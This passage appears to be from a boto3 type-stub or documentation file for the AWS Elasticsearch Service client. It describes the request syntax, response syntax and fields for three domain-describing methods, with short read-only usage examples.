The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon Resource Name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
The Elasticsearch version of the domain.
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should equal the number of subnets if VPC endpoints are enabled.
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions`` .
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC ID for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for the VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for the VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions`` .
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
The log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled or not.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update your service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version update.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain for which you want information.
:rtype: dict
:returns:
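**Example**
A minimal usage sketch for reading back a domain's endpoint, assuming a configured client and an existing domain (public domains return ``Endpoint``; VPC domains return the ``Endpoints`` map instead):
::
    import boto3

    client = boto3.client('es')
    status = client.describe_elasticsearch_domain(DomainName='my-test-domain')['DomainStatus']
    # Prefer the public endpoint when present; fall back to the VPC endpoint map.
    endpoint = status.get('Endpoint') or status.get('Endpoints', {}).get('vpc')
    print(endpoint, 'processing:', status['Processing'])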
"""
pass
def describe_elasticsearch_domain_config(self, DomainName: str) -> Dict:
"""
Provides cluster configuration information about the specified Elasticsearch domain, such as the state, creation date, update version, and update date for cluster options.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchDomainConfig>`_
**Request Syntax**
::
response = client.describe_elasticsearch_domain_config(
DomainName='string'
)
**Response Syntax**
::
{
'DomainConfig': {
'ElasticsearchVersion': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'ElasticsearchClusterConfig': {
'Options': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EBSOptions': {
'Options': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AccessPolicies': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'SnapshotOptions': {
'Options': {
'AutomatedSnapshotStartHour': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'VPCOptions': {
'Options': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'CognitoOptions': {
'Options': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EncryptionAtRestOptions': {
'Options': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'NodeToNodeEncryptionOptions': {
'Options': {
'Enabled': True|False
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AdvancedOptions': {
'Options': {
'string': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'LogPublishingOptions': {
'Options': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``DescribeElasticsearchDomainConfig`` request. Contains the configuration information of the requested domain.
- **DomainConfig** *(dict) --*
The configuration information of the domain requested in the ``DescribeElasticsearchDomainConfig`` request.
- **ElasticsearchVersion** *(dict) --*
String of format X.Y to specify the version for the Elasticsearch domain.
- **Options** *(string) --*
Specifies the Elasticsearch version for the specified Elasticsearch domain.
- **Status** *(dict) --*
Specifies the status of the Elasticsearch version options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **ElasticsearchClusterConfig** *(dict) --*
Specifies the ``ElasticsearchClusterConfig`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the cluster configuration for the specified Elasticsearch domain.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should equal the number of subnets if VPC endpoints are enabled.
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **Status** *(dict) --*
Specifies the status of the configuration for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EBSOptions** *(dict) --*
Specifies the ``EBSOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the EBS options for the specified Elasticsearch domain.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
- **Status** *(dict) --*
Specifies the status of the EBS options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AccessPolicies** *(dict) --*
IAM access policy as a JSON-formatted string.
- **Options** *(string) --*
The access policy configured for the Elasticsearch domain. Access policies may be resource-based, IP-based, or IAM-based. See `Configuring Access Policies <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-access-policies>`__ for more information.
- **Status** *(dict) --*
The status of the access policy for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **SnapshotOptions** *(dict) --*
Specifies the ``SnapshotOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the daily snapshot options specified for the Elasticsearch domain.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **Status** *(dict) --*
Specifies the status of a daily automated snapshot.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **Options** *(dict) --*
Specifies the VPC options for the specified Elasticsearch domain.
- **VPCId** *(string) --*
The VPC ID for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for the VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for the VPC endpoint.
- *(string) --*
- **Status** *(dict) --*
Specifies the status of the VPC options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Options** *(dict) --*
Specifies the Cognito options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **Status** *(dict) --*
Specifies the status of the Cognito options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the ``EncryptionAtRestOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the Encryption At Rest options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **Status** *(dict) --*
Specifies the status of the Encryption At Rest options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the ``NodeToNodeEncryptionOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the node-to-node encryption options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **Status** *(dict) --*
Specifies the status of the node-to-node encryption options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AdvancedOptions** *(dict) --*
Specifies the ``AdvancedOptions`` for the domain. See `Configuring Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information.
- **Options** *(dict) --*
Specifies the advanced options configured for the specified Elasticsearch domain.
- *(string) --*
- *(string) --*
- **Status** *(dict) --*
Specifies the ``OptionStatus`` for advanced options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- **Options** *(dict) --*
The log publishing options configured for the Elasticsearch domain.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
The log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled or not.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled.
- **Status** *(dict) --*
The status of the log publishing options for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp showing the creation date of the entity.
- **UpdateDate** *(datetime) --*
Timestamp showing when the entity was last updated.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The Elasticsearch domain that you want to get information about.
:rtype: dict
:returns:
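**Example**
A minimal sketch that inspects one option's ``OptionStatus`` from the config response, assuming a configured client and an existing domain:
::
    import boto3

    client = boto3.client('es')
    config = client.describe_elasticsearch_domain_config(DomainName='my-test-domain')['DomainConfig']
    ebs_status = config['EBSOptions']['Status']
    # State is one of 'RequiresIndexDocuments', 'Processing', or 'Active'.
    print(ebs_status['State'], 'pending deletion:', ebs_status['PendingDeletion'])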
"""
pass
def describe_elasticsearch_domains(self, DomainNames: List) -> Dict:
"""
Returns domain configuration information about the specified Elasticsearch domains, including the domain ID, domain endpoint, and domain ARN.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchDomains>`_
**Request Syntax**
::
response = client.describe_elasticsearch_domains(
DomainNames=[
'string',
]
)
**Response Syntax**
::
{
'DomainStatusList': [
{
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
